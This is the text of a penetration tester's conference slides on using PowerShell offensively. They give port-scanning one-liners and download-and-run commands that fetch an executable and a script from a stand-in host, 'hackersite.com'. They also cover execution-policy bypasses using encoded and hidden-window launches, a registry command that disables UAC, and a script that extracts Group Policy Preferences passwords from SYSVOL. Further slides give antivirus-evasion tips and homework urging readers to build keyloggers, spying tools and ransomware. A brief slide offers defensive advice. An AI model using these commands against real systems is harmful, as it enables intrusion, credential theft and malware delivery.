Power on, PowerShell Using PowerShell to do the nasty

Nikhil Sreekumar roo7break@gmail.com

@roo7break www.roo7break.co.uk

The plug

• Nikhil Sreekumar – Senior Penetration Tester @ 7Safe

– Over three years as penetration tester • CREST ACE certified

– Also deliver’s 7Safe’s courses • CSTP – Certified Security Testing Professional

• CAST – Certified Application Security Tester (advanced)

– Previous roles • Breach Forensic Investigator

• IT Consultant

– Loves Python; Mixed feelings for Ruby; Hates Perl

Intro

• Normal penetration testing revolves a lot around network based attacks using – Attack frameworks (toolkits)

• Social engineering toolkit • Metasploit • Core Impact

– Exploit sources • Exploit-db.com • 1337day.com

• Exploit -> Get a shell -> Exploit more -> Get domain admin -> Report -> Go out for a beer

But, what if

• You have access to a system, but

– No outbound connection*

– You are in a restricted environment (e.g. Citrix)

– Current user privileges are very restricted

– Payloads/tools detected by Anti-Virus/HIDS

* Open traffic is blocked

Time for a rethink

• Cannot rely on any open source exploitation framework

– AV vendors are WATCHING!

– System/Network admins are getting smarter and cleverer

– Organisations are investing in security

• Maybe its time to think of an alternate solution.

– Why not look into bending existing technology to do our bidding?

Welcome to, PowerShell

• Unix bash like shell in Windows – Way powerful than CMD

• Available from Vista upwards – Can be disabled from Server 2008; however its not

that easy in Windows 7

• Allows to – Manage registry, services, processes, event logs

and Windows Management Instrumentation (WMI) – Task based scripting language – Powerful object manipulation capabilities – Simplified and consistent design

• Full integration with – Existing Microsoft products like Exchange, AD, etc. – Can be directly called from .NET framework

[Microsoft Technet] - http://technet.microsoft.com/en-gb/library/bb978526.aspx

Show me the money

Scripting PowerShell

• Use of CmdLets

– Lightweight command; used in PowerShell environment.

– Typically a .NET framework class

– Invoked within the context of automation scripts provided at the command line.

– Also invoked programmatically through Windows PowerShell APIs.

Scripting PowerShell

• Basic CmdLets

CmdLets PowerShell Alias CMD.exe *nix environment

Get-Help man, help help man

Get-Content cat, gc, type type cat

Move-Item move, mv, mi move mv

Copy-Item cp, copy, cpi copy cp

Select-String NONE find, findstr grep

Source: http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers

Scripting PowerShell

• Basic CmdLets (contd.) – Where-Object (alias ?)

• Filter objects passed down via pipe (|)

Get-Service | ? $_.Status –eq “Running”

Get-Process | ? $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*"

– ForEach-Object (alias %)

• Not to be confused with loop statement, ForEach • Action to be performed on each object passed down via pipe (|)

Get-ChildItem | ForEach-Object echo $_.Name

Same as dir :D

– Get-Member (alias gm)

• Provides you the list of all objects you can access to filter your query using ? And %

Get-ChildItem | gm

• For more info, refer: – http://www.powershellpro.com/powershell-tutorial-introduction/tutorial-powershell-cmdlet/ – http://technet.microsoft.com/en-us/scriptcenter/dd772285.aspx

How to script using PowerShell

• Using the PowerShell shell

– RUN powershell.exe to start

• Echo commands into a file; Save as .ps1

– .ps1 files are automatically recognised as PowerShell scripts

– Can be manipulated using the built-in PowerShell Integrated Scripting Environment (ISE) – IDE for PowerShell

Sample uses for PT

• Port Scanning 1..1024 | ForEach-Object

echo

((new-object Net.Sockets.TcpClient)

.Connect(“<TargetIP>",$_)) “Port $_ is

open"

2>$null

Port 80 is open

• You could modify the script above to send a string to remote host) for Egress checking

• Port Sweep

– Scan the range for all IPs with port 8080 open 1..255 | ForEach-Object

echo

((New-Object Net.Sockets.TcpClient)

.Connect("10.1.1.$_",8080)) "10.1.1.$_:8080

is open"

2>$null

10.1.1.100:8080 is open

Sample uses for PT

Sample uses for PT

• Downloading stuff

– Binaries (New-Object

System.Net.WebClient).DownloadFile("http://h

ackersite.com/pwnc.exe","c:\pwnc.exe“)

– Text file stdout to local file (New-Object

System.Net.WebClient).DownloadString("http:/

/hackersite.com/malicious.ps1") | Out-File –

Encoding ASCII securescript.ps1

Hold on tiger

• Did you really think its going to be that easy??

– PowerShell isn’t going to let you run any script without having a say.

• It tries to enforce “security” using something called Execution Policy.

– Get-Execution Policy

• Will give you current policy status

The Security

• Execution Policies: – Restricted

• Default policy • Only individual commands; no scripts

– AllSigned • Allows scripts execution • Needs to be signed by trusted publisher • Prompts if ran using untrusted publishers

– RemoteSigned • Allows scripts execution • Scripts downloaded from Internet should be signed by trusted

publisher • Signing not required for local scripts

The Security (contd.)

– Unrestricted • Allows unsigned script execution

• Prompts warning before execution

– Bypass • Nothing is blocked; no warnings or prompts

• To be used when PowerShell is used within a larger app

– Undefined • No specific policy is set to current scope

– If nothing is specified, default policy is applied = Restricted.

• For more information, RTFM

However

Before we move on

• UAC (User Account Control)

– Is a pain in the a**

• Most of the attacks described may/may not interfere with UAC.

• At this point in time, we cannot bypass UAC. Or can we?

– Will take this up at a later stage.

To check UAC level $(Get-ItemProperty -Path

registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\p

olicies\system -Name EnableLUA).EnableLUA

If value is “1”, then UAC is ON.

• To disable UAC Set-ItemProperty -Path

HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system -Name

EnableLUA –Value

However, we need local admin rights

And, a system reboot for this to change to take effect

Think like a hacker

• These policies can be bypassed

• Technique #1

Change the default policy to RemoteSigned

Set-ExecutionPolicy RemoteSigned

–Scope CurrentUser

– However we need admin privileges to do this

– You don’t want to ‘accidently’ set the policy for all users

Think like a hacker

• Technique #2

Pass the command

powershell –command dir

• Executes the specified commands (and any parameters) as though they were typed at the PowerShell command prompt

[Powershell Help]

Think like a hacker

• Technique #2 (contd.) Pass the command powershell –command “New-Object System.Net.WebClient).DownloadFile("http://hackersite.com/pwnc.exe","c:\pwnc.exe“)”

powershell –command “Invoke-Expression (gc .\script.ps1)”

• Need a one liner?

gc .\script.ps1 | iex

Think like a hacker

• Technique #3 CreateCMD • Run a script without actually running a script

– execute the script contents in the current shell context with all new functions that are in the script

• Uses “-EncodedCommand” – Accepts Base64 version of the command

• Checkout Dave Kennedy (ReL1K) and Josh Kelly (winfang) Defcon 18 talk – PowerShell.. OMFG

• Impact – Policy does not matter – No need to disable execution policies – No registry interaction, no reboots, etc.

Think like a hacker

• Technique #3 (contd.) – Write your script (.ps1) in one long line.

– All s should be on the same line and use ; to terminate each command.

$command = Get-Content .\script.ps1

$encodedcmd =

[convert]::ToBase64String([Text.Encod

ing]::Unicode.GetBytes($command))

Powershell.exe –EncodedCommand

$encodedcmd

Think like a hacker

• Technique #4 • This technique will

– try and bypass the execution policy – execute the script in the background

• Can be used once you have a way into a system – E.g. shell

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File <script_name>

Source: http://obscuresecurity.blogspot.co.uk/2011/08/powershell-executionpolicy.html

Post Exploitation the PowerShell way

Exploiting Windows 2008 Group Policy Preferences

• Group Policy preferences, new for the Windows Server 2008 operating system, include more than 20 new Group Policy extensions that expand the range of configurable settings within a Group Policy object (GPO) [http://technet.microsoft.com/en-

us/library/cc731892%28WS.10%29.aspx]

• Helps setting local admin password for workstations and servers – Adding new users on local machines, etc.

– Via Local User and Groups Extension

Post Exploitation the PowerShell way

Exploiting Windows 2008 Group Policy Preferences (contd.)

• Unknown to the general public (and many system admins) Windows was storing the encrypted admin passwords in an XML files accessible to normal users

• Location: – \\server\\sysvol\domain\Policies\Hash\MACHINE\Preferences\Grou

ps\Group.xml

Post Exploitation the PowerShell way

Exploiting Windows 2008 Group Policy Preferences (contd.)

Post Exploitation the PowerShell way

Exploiting Windows 2008 Group Policy Preferences (contd.)

• Encryption – AES = Strong

• It would take years to decrypt that password. Only if someone could help me..

• Why not ask Microsoft?

http://msdn.microsoft.com/en-us/library/cc422924.aspx

Post Exploitation the PowerShell way

• Lets use PowerShell to extract these passwords

– Connect to domain controller as normal user

$output = get-childitem

\\server\\sysvol\domain\Policies\ -

filter *.xml -recurse | Get-

Content;[regex]::match($output,'cpassw

ord="(?<pwd>.+?)"') | foreach

$_.groups["pwd"].value

Post Exploitation the PowerShell way

• Are there any more locations?

• Oh yeah! – Services\Services.xml

– ScheduledTasks\ScheduledTasks.xml

– Printers\Printers.xml

– Drives\Drives.xml

– DataSources\DataSources.xml

• Source: http://rewtdance.blogspot.co.uk/2012/06/exploiting-windows-2008-group-policy.html

Post Exploitation the PowerShell way

Would you like some exploitation with that, Sir?

• Default tools/exploits/payloads are detectable – Customize them

– Design your own exploits

– Innovative encoding/encryption techniques

– Use PowerShell to execute it for you

• Examples – Hyperion runtime encrypter by Nullsecurity.net

• Produces an AES encrypted executable that brute forces its own key in-memory

• Can bypass most anti-virus solutions

• http://nullsecurity.net/papers.html

– Alphanum + ASCII encode + Base64 your executable (use metasploit to do this – msfvenom)

• Then use PowerShell to decode it in-memory and execute it

– Check out www.exploit-monday.com by Matthew Graeber for sample codes

– Also check out the PowerShell code used in SET - http://svn.secmaniac.com/social_engineering_toolkit/src/powershell/

• Can bypass most anti-virus solutions

• http://www.offensive-security.com/metasploit-unleashed/Msfvenom

• Homework • Try out PowerShell based attacks using Social Engineering

Toolkit (SET) • Recode Metasploit modules to be used within PowerShell

scripts • Come up with innovative attacks using PowerShell.

– Webcam, microphone, keyloggers, etc.

• Naughty, naughty. • How about designing your own ransomware

– Note: Use only on your system. DO NOT SEND TO ANYONE ELSE. I will not accept any responsibility for your actions. Your actions, your responsibility. I have warned you.

– http://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/

More??

Powered by PowerShell

• Existing PowerShell based attack tools – Metasploit PowerShell modules

– PowerSploit

– Nishang

– PowerSyringe

• Recommended Reads and References – PowerShell for Pentesters

• http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers

– PowerShell OMFG

• https://www.trustedsec.com/august-2010/powershell_omfg/

– PowerShell Code Repository

• http://poshcode.org/

– Windows PowerShell Cookbook

• By Lee Holmes

– Server 2008 Group Policy Preferences (GPP) – And how they get your domain 0wned

• By Chris Gates (carnal0wnage)

• http://www.slideshare.net/chrisgates/exploiting-group-policy-preferences

And to conclude

• Sys admins/Network admins/Managers – Check out every new feature introduced by a vendor – Is it necessary for your org? No? Remove/Disable it. – Ensure AV is installed and updated on production environment. – Attend more security conferences to find out what new tech the

hackers could use to attack your organisation.

• Hacker/Pentesters – Check out every new feature introduced by a vendor – Look at how you can twist various features to do your bidding – Don’t rely on your attacks tools – Remember AV vendors are watching and catching up – Push yourself – come up with innovative tech – Communicate all new tech u find. Our community is very open. You

could end up finding an even better way to attack.

• Twitter: @roo7break • Web: www.roo7break.co.uk • Email: roo7break@gmail.com